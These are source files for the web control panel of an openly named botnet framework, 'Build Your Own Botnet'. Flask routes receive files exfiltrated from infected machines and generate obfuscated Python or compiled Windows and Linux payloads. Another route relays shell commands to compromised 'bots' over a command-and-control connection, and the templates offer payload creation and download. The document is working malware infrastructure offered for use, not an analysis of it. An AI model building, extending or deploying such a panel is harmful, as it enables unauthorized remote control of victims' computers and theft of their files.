web-gui/buildyourownbotnet/api/files/routes.py
import os
import base64
import string
import random
from flask import Blueprint, request
from buildyourownbotnet.core import generators
from buildyourownbotnet.core.dao import file_dao


# Blueprint
files = Blueprint('files', __name__)


@files.route("/api/file/add", methods=["POST"])
def file_add():
	"""Upload new exfilrated file."""
	b64_data = request.form.get('data')
	filetype = request.form.get('type')
	owner = request.form.get('owner')
	module = request.form.get('module')
	session = request.form.get('session')
	filename = request.form.get('filename')

	# decode any base64 values
	try:
		data = base64.b64decode(b64_data)
	except:
		if b64_data.startswith('_b64'):
			data = base64.b64decode(b64_data[6:]).decode('ascii')
		else:
			print('/api/file/add error: invalid data ' + str(b64_data))
			return
	try:
		session = base64.b64decode(session)
	except:
		try:
			if session.startswith('_b64'):
				session = base64.b64decode(session[6:]).decode('ascii')
		except:
			pass

	# add . to file extension if necessary
	if not filetype:
		filetype = '.dat'
	elif not filetype.startswith('.'):
		filetype = '.' + filetype

	# generate random filename if not specified
	if not filename:
		filename = generators.variable(length=3) + filetype

	output_path = os.path.join(os.getcwd(), 'buildyourownbotnet/output', owner, 'files', filename)

	# add exfiltrated file to database
	file_dao.add_user_file(owner, filename, session, module)

	# save exfiltrated file to user directory
	with open(output_path, 'wb') as fp:
		fp.write(data)

	return filename

web-gui/buildyourownbotnet/api/payload/routes.py
import os
import subprocess
from flask import Blueprint, request, redirect, url_for, flash
from flask_login import login_user, logout_user, current_user, login_required
from buildyourownbotnet import client
from buildyourownbotnet.core.dao import payload_dao

# Blueprint
payload = Blueprint('payload', __name__)

# Routes
@payload.route("/api/payload/generate", methods=["POST"])
@login_required
def payload_generate():
	"""Generates custom client scripts."""

	# required fields
	payload_format = request.form.get('format')
	operating_system = request.form.get('operating_system')
	architecture = request.form.get('architecture')

	# flash error message if user doesn't select a payload format
	if not payload_format:
		flash('Please select a payload format.', 'warning')
		return redirect(url_for('main.payloads'))

	# flash error message if user selects executable format without OS/arch
	if 'exe' in payload_format and (operating_system is None or architecture is None):
		flash('Please select an operating system and architecture to generate a binary executable.', 'warning')
		return redirect(url_for('main.payloads'))

	# optional fields
	encrypt = request.form.get('encrypt') if 'encrypt' in request.form else 0
	compress = request.form.get('compress') if 'compress' in request.form else 0
	freeze = 0 if 'py' in payload_format else 1

	if freeze and subprocess.check_call(['which','docker']) != 0:
		flash('Error: Docker is not installed or is not configured properly.')
		return redirect(url_for('payloads'))

	# write dropper to user's output directory and return client creation page
	options = {
		'encrypt': encrypt,
		'compress': compress, 
		'freeze': freeze, 
		'gui': 1, 
		'owner': current_user.username, 
		'operating_system': operating_system, 
		'architecture': architecture
	}

	try:
		outfile = client.main('', '', '', '', '', '', **options)

		# if pure python format, nullify os/arch before inserting record into database
		operating_system = 'py' if 'py' in payload_format else operating_system
		architecture = None if 'py' in payload_format else architecture

		# add payload to database
		payload_dao.add_user_payload(current_user.id, os.path.basename(outfile), operating_system, architecture)
		flash('Successfully generated payload: ' + os.path.basename(outfile), 'success')
	except Exception as e:
		flash('Error: compilation timed out or failed. Please go to the Discord support server for help.')
		print("Exception in api.routes.payload.payload_generate: " + str(e))
	return redirect(url_for('main.payloads'))

web-gui/buildyourownbotnet/api/session/routes.py
import json
from flask import current_app, Blueprint, request, redirect, url_for, flash, jsonify
from flask_login import login_user, logout_user, current_user, login_required
from buildyourownbotnet import c2
from buildyourownbotnet.core.dao import session_dao, task_dao
from buildyourownbotnet.models import db, Session

# Blueprint
session = Blueprint('session', __name__)

@session.route("/api/session/new", methods=["POST"])
def session_new():
	"""Add session metadata to database."""
	if not request.json:
		return redirect(url_for('main.sessions'))
	data = dict(request.json)
	session_metadata = session_dao.handle_session(data)
	return jsonify(session_metadata)

@session.route("/api/session/remove", methods=["POST"])
@login_required
def session_remove():
	"""End an active session."""
	session_uid = request.form.get('session_uid')

	if not session_uid:
		flash('Invalid session UID', 'danger')
		return redirect(url_for('main.sessions'))

	# kill connection to C2
	owner_sessions = c2.sessions.get(current_user.username, {})

	if session_uid and session_uid in owner_sessions:
		session_thread = owner_sessions[session_uid]
		try:
			session_thread.kill()
		except Exception as e:
			return "Error ending session - please try again."

	# remove session from database
	s = session_dao.delete_session(session_uid)
	return "Session {} removed.".format(session_uid)


@session.route("/api/session/cmd", methods=["POST"])
@login_required
def session_cmd():
	"""Send commands to clients and return the response."""
	session_uid = request.form.get('session_uid')

	# validate session id is valid integer
	if not session_uid:
		flash("Invalid bot UID: " + str(session_uid))
		return redirect(url_for('main.sessions'))

	command = request.form.get('cmd')

	# get user sessions
	owner_sessions = c2.sessions.get(current_user.username, {})

	if session_uid in owner_sessions:
		session_thread = owner_sessions[session_uid]

		# store issued task in database
		task = task_dao.handle_task({'task': command, 'session': session_thread.info.get('uid')})

		# send task and get response
		session_thread.send_task(task)
		response = session_thread.recv_task()

		# update task record with result in database
		result = task_dao.handle_task(response)
		return str(result['result']).encode()

	else:
		return "Bot " + str(session_uid) + " is offline or does not exist."


@session.route("/api/session/poll", methods=["GET"])
@login_required
def session_poll():
	"""Return list of sessions (JSON)."""
	new_sessions = []
	for s in session_dao.get_user_sessions_new(current_user.id):
		new_sessions.append(s.serialize())
		s.new = False
		db.session.commit()
	return jsonify(new_sessions)

web-gui/buildyourownbotnet/main/routes.py
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""Routes (Build Your Own Botnet)"""

import os
import sys
import json
import shutil
from datetime import datetime

from flask import current_app, Blueprint, flash, redirect, render_template, request, url_for, send_from_directory
from flask_login import login_user, logout_user, current_user, login_required

from buildyourownbotnet import client, c2
from buildyourownbotnet.core.dao import file_dao, payload_dao, session_dao
from buildyourownbotnet.users.forms import RegistrationForm, LoginForm, UpdateAccountForm
from buildyourownbotnet.models import db, bcrypt, User, Session
from buildyourownbotnet.utils import get_sessions_serialized, get_tasks_serialized

# Blueprint
main = Blueprint('main', __name__)

# Globals
OUTPUT_DIR = os.path.abspath('buildyourownbotnet/output')

# Routes
@main.route("/dashboard")
@main.route("/sessions", methods=["GET"])
@login_required
def sessions():
	"""Display active/inactive sessions"""
	sessions = get_sessions_serialized(current_user.id)
	return render_template("sessions.html", sessions=sessions, n=len(sessions), title="Control Panel")


@main.route("/payloads")
@login_required
def payloads():
	"""Page for creating custom client scripts. Custom client scripts are generated on this page by sending user inputted values to 
	the '/generate' API endpoint, which writes the dropper to the user's output directory."""
	payloads = payload_dao.get_user_payloads(current_user.id)
	return render_template("payloads.html", 
							payloads=payloads, 
							owner=current_user.username, 
							title="Payloads")


@main.route("/files")
@login_required
def files():
	"""Page for displaying files exfiltrated from client machines"""
	user_files = file_dao.get_user_files(current_user.id)
	return render_template("files.html", 
							files=user_files, 
							owner=current_user.username, 
							title="Files")


@main.route("/")
def home():
	"""Home page"""
	return render_template("home.html")


@main.route("/docs")
def docs():
	"""Project documentation."""
	return render_template("how-it-works.html", title="How It Works")


@main.route("/guide")
def guide():
	"""Quick start guide."""
	return render_template("guide.html", title="Guide")


@main.route("/faq")
def faq():
	"""FAQ page."""
	return render_template("faq.html", title="FAQ")


@main.route("/shell")
@login_required
def shell():
	"""Interact with a client session. Commands entered in JQuery terminal on the front-end are sent to back to the 
	Python back-end via POST to the API endpoint /cmd, where it can directly 
	call the C2 server's send_task and recv_task methods to transmit encrypted
	tasks/results via TCP connection."""
	session_uid = request.args.get('session_uid')

	# validate session id is valid integer
	if not session_uid:
		flash("Invalid bot UID: {}".format(session_uid))
		return redirect(url_for('main.sessions'))

	# get current user sessions
	owner_sessions = c2.sessions.get(current_user.username)

	# check if owner has any active sessions
	if not owner_sessions:
		session_dao.update_session_status(session_uid, 0)
		flash("You have no bots online.", "danger")
		return redirect(url_for('main.sessions'))

	# check if requested session is owned by current user
	if session_uid not in owner_sessions:
		session_dao.update_session_status(session_uid, 0)
		flash("Invalid bot UID: " + str(session_uid))
		return redirect(url_for('main.sessions'))

	# get requested session
	session_thread = owner_sessions.get(session_uid)

	# if session is online, authenticate user and enter shell
	if session_thread:
		if session_thread.info['owner'] == current_user.username:
			return render_template("shell.html", 
									session_uid=session_uid, 
									info=session_thread.info, 
									title="Shell")
		else:
			flash("Bot not owned by current user.", "danger")
			return redirect(url_for('main.sessions'))

	# if bot is offline, update status in database and notify user
	else:
		session_dao.update_session_status(session_uid, 0)
		flash("Bot is offline.", "danger")
		return redirect(url_for('main.sessions'))


@main.route("/tasks", methods=["GET"])
@login_required
def tasks():
	"""Task history for a client"""
	session_uid = request.args.get('session_uid')

	# get serialized task history from database
	tasks = get_tasks_serialized(session_uid)

	# show task history as a table
	return render_template("tasks.html", 
							tasks=tasks, 
							session_uid=session_uid,
							title="Tasks")


#####################
#
# DOWNLOADS
#
#####################

@main.route("/output/<user>/src/dist/<operating_system>/<filename>")
@login_required
def download_executable(user, operating_system, filename):
	"""Download user generated binary executable payload."""
	return send_from_directory(os.path.join(OUTPUT_DIR, user, 'src', 'dist', operating_system), filename, as_attachment=True)


@main.route("/output/<user>/src/<filename>")
@login_required
def download_payload(user, filename):	
	"""Download user generated Python payload."""
	return send_from_directory(os.path.join(OUTPUT_DIR, user, 'src'), filename, as_attachment=True)


@main.route("/output/<user>/files/<filename>")
@login_required
def download_file(user, filename):
	"""Download user exfiltrated file."""
	return send_from_directory(os.path.join(OUTPUT_DIR, user, 'files'), filename, as_attachment=True)

web-gui/buildyourownbotnet/templates/account.html
{% extends "layout.html" %}

{% block slider %}
<div class="demo-1 black-canvas" style="z-index: 0;">
	<div class="content">
		<div id="large-header" class="large-header">
			<canvas id="demo-canvas"></canvas>
			<h1></h1>
		</div>
	</div>
</div>
{% endblock slider %}

{% block main %}
<style>

	.input-group {
		width: 30%;
	}

</style>

<div class="container" style="z-index: 1; position: absolute; top: 0; left: 50%; transform: translate(-50%, -100%);">
	<h1 align="center" style="color: white;">Change Password</h1>

	<hr style="width: 30%"/>

	<div class="row" align="center">

		<div class="col-md-12" align="center">

			<div class="login-form">
				
				<div class="login-content">
					
					<!-- edit account form -->
					<form method="post" action="" enctype="multipart/form-data">
		            {{ form.hidden_tag() }}

						<!-- password field -->
		                <div class="form-group">
							<div class="input-group">
<!-- 								{{ form.password.label() }}
 -->			                    {% if form.password.errors %}

			                        {{ form.password(class="form-control is-invalid") }}
			                        <div class="invalid-feedback">
			                            {% for error in form.password.errors %}
			                                <span>{{ error }}</span>
			                            {% endfor %}
			                        </div>

			                    {% else %}
			                        {{ form.password(class="form-control", placeholder="New Password") }}
			                    {% endif %}
			                </div>
		                </div>

		                <!-- confirm password field -->
		                <div class="form-group">
							<div class="input-group">
	
<!-- 							{{ form.confirm_password.label() }}
 -->		                    {% if form.confirm_password.errors %}
		                        {{ form.confirm_password(class="form-control is-invalid") }}
		                        <div class="invalid-feedback">
		                            {% for error in form.confirm_password.errors %}
		                                <span>{{ error }}</span>
		                            {% endfor %}
		                        </div>

		                    {% else %}
		                        {{ form.confirm_password(class="form-control", placeholder="Confirm New Password") }}
		                    {% endif %}
			                </div>
		                </div>

		                <br/>

			            <div class="form-group">
			                {{ form.submit(class="btn btn-info btn-block btn-login", style="text-align: center; width: 30%") }}
				       </div>
					
					</form>
				</div>
			</div>
		</div>
	</div>
</div>
{% endblock %}

web-gui/buildyourownbotnet/templates/help.html
{% extends "layout.html" %}

{% block main %}

<h1 align="center" style="color: white;">Support</h1>

<span>Need help? Email security@malwared.com with questions.</span>

{% endblock main %}

web-gui/buildyourownbotnet/templates/payloads.html
{% extends "layout.html" %}

<link rel="stylesheet" href="/assets/js/jquery-ui/css/no-theme/jquery-ui-1.10.3.custom.min.css">
<link rel="stylesheet" href="/assets/css/font-icons/entypo/css/entypo.css">
<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Noto+Sans:400,700,400italic">
<link rel="stylesheet" href="/assets/css/bootstrap.css">
<link rel="stylesheet" href="/assets/css/neon-core.css">
<link rel="stylesheet" href="/assets/css/neon-theme.css">
<link rel="stylesheet" href="/assets/css/neon-forms.css">
<link rel="stylesheet" href="/assets/css/custom.css">

<script src="/assets/js/jquery-1.11.3.min.js"></script>

{% block slider %}
<div class="demo-1 black-canvas" style="z-index: 0;">
	<div class="content">
		<div id="large-header" class="large-header">
			<canvas id="demo-canvas"></canvas>
			<h1></h1>
		</div>
	</div>
</div>
{% endblock slider %}


{% block main %}
<style>
	a {
		color: #4497fc;
	}

	a:hover {
		color: gray;
	}
</style>

<div class="container" style="z-index: 1; position: absolute; top: 100px; left: 50%; transform: translate(-50%, -500px);">

	<h1 align="center" style="color: white;">Payloads</h1>
	
	<hr/>
	<br/>

	<!-- Row 1 -->
	<div class="row">

		<!-- Column 1 (Payload Generator) -->
		<div class="col-md-6">

			<div class="panel panel-dark" data-collapsed="0" id="payload-panel">

				<!-- panel head -->
				<div class="panel-heading">
					<div class="panel-title" id="module-name">Generate Payload</div>
				</div>

				<!-- panel body -->
				<div class="panel-body">
					<form action="{{ url_for('payload.payload_generate') }}" method="post">
						<div class="form-group" align="left">

							<!-- Select payload format -->
							<label for="format" id="format-label" style="padding: 5px">Format</label>

							<select required class="selectboxit" data-first-option="false" id="format" name="format">
								<option>Select Format</option>
								<option value="py">Python</option>
								<option value="exe">Executable</option>
							</select>

							<!-- Select payload operating system (if executable format) -->
							<label for="operating_system" id="os-label" style="padding: 5px;">Operating System</label>

							<select class="selectboxit" data-first-option="false" id="os" name="operating_system" onclick="updateArchOptions()">
							  <option>Select Operating System</option>
							  <option value="win">Windows</option>
							  <option value="nix">Linux</option>
							</select>

							<!-- Select payload architecture (if executable format) -->
							<label for="architecture" id="arch-label" style="padding: 5px">Architecture</label>

							<select class="selectboxit" data-first-option="false" id="arch" name="architecture">
								<option>Select Architecture</option>
								<option value="x32">x32</option>
								<option value="amd64">amd64</option>
								<option value="i386">i386</option>
							</select>

							<br/>

							<!-- Generate button -->
							<button class="btn btn-green entypo-plus-circled" data-loading-text="Generating..." type="submit" id="generate-button" onclick="$('#patient').show(); show_loading_bar(78);"> Generate</button>

							<span id="patient">This can take a few minutes, please be patient.</span>
						 </div>
					</form>
				</div>
			</div>
		</div>

		<!-- Column 2 (Instructions) -->
		<div class="col-md-6">
			<div class="panel panel-dark" data-collapsed="0" style="height: 325px">
				
				<!-- panel head -->
				<div class="panel-heading">
					{% if not payloads %}
						<div class="panel-title" id="module-name">You have no payloads yet!</div>
					{% else %}
						<div class="panel-title" id="module-name">How to generate a payload</div>
					{% endif %}
				</div>
				
				<!-- panel body -->
				<div class="panel-body">

					<!-- Module Description -->
					<div id="payloads-description" style="padding-bottom: 5px">
						<span style="font-size: 15px;">Select a payload <strong>format</strong> to get started.</span>	
					</div>

					<!-- Module Info -->
				 	<ul name="payloads-info" id="payloads-info">
					 		
				  		<li style="padding: 10px">
				 			<strong>Python</strong> - Obfuscated Python script. The file size is quite small, however, it requires Python be installed on the target system to run.
				 		</li>
				 		<li style="padding: 10px">
				 			<strong>Executable</strong> - Compile a binary executable for a target operating system and architecture. This will run on systems which do not have Python installed, however, the file size is larger.
				 		</li>
				 		<li style="padding: 10px">
				 			<strong>Need help?</strong> Check out the <a href="{{ url_for('main.faq') }}">FAQ</a> page.
				 		</li>
				 	</ul>

					<!-- Module Platforms -->
					<div id="module-platforms"></div>
					
				</div>
				
			</div>
		</div>
	</div>


	<!-- Row 2 -->
	<div class="row-md-12">

		<!-- Payloads Table -->
		<div name="existing-payloads">

			<script type="text/javascript">
			jQuery( document ).ready( function( $ ) {
				var $table3 = jQuery("#payloads-table");
				
				var table3 = $table3.DataTable( {
					"aLengthMenu": [[10, 25, 50, -1], [10, 25, 50, "All"]]
				} );
				
				// Initalize Select Dropdown after DataTables is created
				$table3.closest( '.dataTables_wrapper' ).find( 'select' ).select2( {
					minimumResultsForSearch: -1
				});
				
				// Setup - add a text input to each footer cell
				// $( '#sessions-table tfoot th' ).each( function () {
				// 	var title = $('#sessions-table thead th').eq( $(this).index() ).text();
				// 	$(this).html( '<input type="text" class="form-control" placeholder="Search" />' );
				// });
				
				// Apply the search
				table3.columns().every( function () {
					var that = this;
				
					$( 'input', this.header() ).on( 'keyup change', function () {
						if ( that.search() !== this.value ) {
							that
								.search( this.value )
								.draw();
						}
					});
				});
			} );
			</script>

			<table class="table table-bordered datatable" id="payloads-table" style="opacity: 1.0;">
				<thead>
					<tr class="replace-inputs"">
						<th class="text-center" style="color: black; text-align: center; vertical-align: middle;">Filename</th>
						<th class="text-center" style="color: black; text-align: center; vertical-align: middle;">Format</th>
						<th class="text-center" style="color: black; text-align: center; vertical-align: middle;">Architecture</th>
						<th class="text-center" style="color: black; text-align: center; vertical-align: middle;">Created</th>
						<th class="text-center" style="color: black; text-align: center; vertical-align: middle;">Download</th>
					</tr>
				</thead>
				<tbody id="payloads-table-body">
					{% for f in payloads %}
						<tr style="background-color: white; color: grey;">
							<td class="text-center" style="text-align: center; vertical-align: middle;">{{ f.filename }}</td>
							<td class="text-center" style="text-align: center; vertical-align: middle;"><img src="/assets/images/os/{{ f.operating_system }}.png" width="20" height="20"></td>
							<td class="text-center" style="text-align: center; vertical-align: middle;">{{ f.architecture }}</td>
							<td class="text-center" style="text-align: center; vertical-align: middle;">{{ f.created }}</td>					
							<td class="text-center" style="text-align: center; vertical-align: middle;">
								<i class="entypo-download" owner="{{ f.owner }}" filename="{{ f.filename }}" os="{{ f.operating_system }}" arch="{{ f.architecture }}" onclick="download(this)" style="cursor: pointer;"></i>
							</td>
						</tr>
					{% endfor %}
				</tbody>
			</table>
		</div>
	</div>

	<script>

		function download(element) {
			var path = 'output/' + element.getAttribute('owner') + '/src/';

			if (element.getAttribute('os') === 'nix') {
				path += 'dist/linux/';
			} else if (element.getAttribute('os') === 'win') {
				path += 'dist/windows/';
			}

			path += element.getAttribute('filename');
			
			location.href = path;
		}

		function updateOSOptions() {
			var el = $("#formatSelectBoxItText");

			if (el.attr('data-val') === "exe") {
				$('#osSelectBoxItContainer').slideDown();
				$('#archSelectBoxItContainer').slideDown();
				$('#os-label').slideDown();
				$('#arch-label').slideDown();
			} else {
				$('#osSelectBoxItContainer').slideUp();
				$('#archSelectBoxItContainer').slideUp();
				$('#os-label').slideUp();
				$('#arch-label').slideUp();
			}
		}

		function updateArchOptions() {
		    var el = $("#osSelectBoxItText");

		    if(el.attr('data-val') === "nix" ) {

		    	// update options
		    	$("#arch").children().remove()
		    	$("#arch").append('<option value="amd64">amd64</option>');
		    	$("#arch").append('<option value="i386">i386</option>');

		    	// update selectBoxIt options
		    	$("#archSelectBoxItOptions").children().remove();
		    	$("#archSelectBoxItOptions").append('<li id="arch0" data-id="1" value="amd64" data-val="amd64" data-disabled="false" class="selectboxit-option" role="option"><a class="selectboxit-option-anchor"><span class="selectboxit-option-icon-container"><i class="selectboxit-option-icon  selectboxit-container"></i></span>amd64</a></li>');
		    	$("#archSelectBoxItOptions").append('<li id="arch2" data-id="2" value="i386" data-val="i386" data-disabled="false" class="selectboxit-option" role="option"><a class="selectboxit-option-anchor"><span class="selectboxit-option-icon-container"><i class="selectboxit-option-icon  selectboxit-container"></i></span>i386</a></li>');
		    } else {
		    	//update options
		    	$("#arch").children().remove();
		    	$("#arch").append('<option value="x32">x32</option>');

		    	// update selectBoxIt options
		    	$("#archSelectBoxItOptions").children().remove();
		    	$("#archSelectBoxItOptions").append('<li id="arch1" data-id="0" value="x32" data-val="x32" data-disabled="false" class="selectboxit-option" role="option"><a class="selectboxit-option-anchor"><span class="selectboxit-option-icon-container"><i class="selectboxit-option-icon  selectboxit-container"></i></span>x32</a></li>');
		   	}
		}
			
	</script>

	<!-- Imported styles on this page -->
	<link rel="stylesheet" href="/assets/js/datatables/datatables.css">
	<link rel="stylesheet" href="/assets/js/select2/select2-bootstrap.css">
	<link rel="stylesheet" href="/assets/js/select2/select2.css">
	<link rel="stylesheet" href="/assets/js/selectboxit/jquery.selectBoxIt.css">

	<!-- Bottom scripts (common) -->
	<script src="assets/js/gsap/TweenMax.min.js"></script>
	<script src="assets/js/jquery-ui/js/jquery-ui-1.10.3.minimal.min.js"></script>
	<script src="assets/js/bootstrap.js"></script>
	<script src="assets/js/joinable.js"></script>
	<script src="assets/js/resizeable.js"></script>
	<script src="assets/js/neon-api.js"></script>
	<script src="/assets/js/selectboxit/jquery.selectBoxIt.min.js"></script>


	<!-- Imported scripts on this page -->
	<script src="assets/js/datatables/datatables.js"></script>
	<script src="assets/js/select2/select2.min.js"></script>
	<script src="assets/js/neon-chat.js"></script>


	<!-- JavaScripts initializations and stuff -->
	<script src="assets/js/neon-custom.js"></script>




	<!-- Imported styles on this page -->
	<link rel="stylesheet" href="/assets/js/select2/select2-bootstrap.css">
	<link rel="stylesheet" href="/assets/js/select2/select2.css">
	<link rel="stylesheet" href="/assets/js/selectboxit/jquery.selectBoxIt.css">
	<link rel="stylesheet" href="/assets/js/daterangepicker/daterangepicker-bs3.css">
	<link rel="stylesheet" href="/assets/js/icheck/skins/minimal/_all.css">
	<link rel="stylesheet" href="/assets/js/icheck/skins/square/_all.css">
	<link rel="stylesheet" href="/assets/js/icheck/skins/flat/_all.css">
	<link rel="stylesheet" href="/assets/js/icheck/skins/futurico/futurico.css">
	<link rel="stylesheet" href="/assets/js/icheck/skins/polaris/polaris.css">

	<!-- Bottom scripts (common) -->
	<script src="/assets/js/gsap/TweenMax.min.js"></script>
	<script src="/assets/js/jquery-ui/js/jquery-ui-1.10.3.minimal.min.js"></script>
	<script src="/assets/js/bootstrap.js"></script>
	<script src="/assets/js/joinable.js"></script>
	<script src="/assets/js/resizeable.js"></script>
	<script src="/assets/js/neon-api.js"></script>


	<!-- Imported scripts on this page -->
	<script src="/assets/js/select2/select2.min.js"></script>
	<script src="/assets/js/bootstrap-tagsinput.min.js"></script>
	<script src="/assets/js/typeahead.min.js"></script>
	<script src="/assets/js/selectboxit/jquery.selectBoxIt.min.js"></script>
	<script src="/assets/js/bootstrap-datepicker.js"></script>
	<script src="/assets/js/bootstrap-timepicker.min.js"></script>
	<script src="/assets/js/bootstrap-colorpicker.min.js"></script>
	<script src="/assets/js/moment.min.js"></script>
	<script src="/assets/js/daterangepicker/daterangepicker.js"></script>
	<script src="/assets/js/jquery.multi-select.js"></script>
	<script src="/assets/js/icheck/icheck.min.js"></script>
	<script src="/assets/js/neon-chat.js"></script>


	<!-- JavaScripts initializations and stuff -->
	<script src="/assets/js/neon-custom.js"></script>


	<script>
		$(document).ready(function(){
			$('#format').selectBoxIt().change(function(){
				updateOSOptions();
			});

			$('#os').selectBoxIt().change(function(){
				updateArchOptions();
			});

			$('#patient').hide();
		});
	</script>
</div>
{% endblock main %}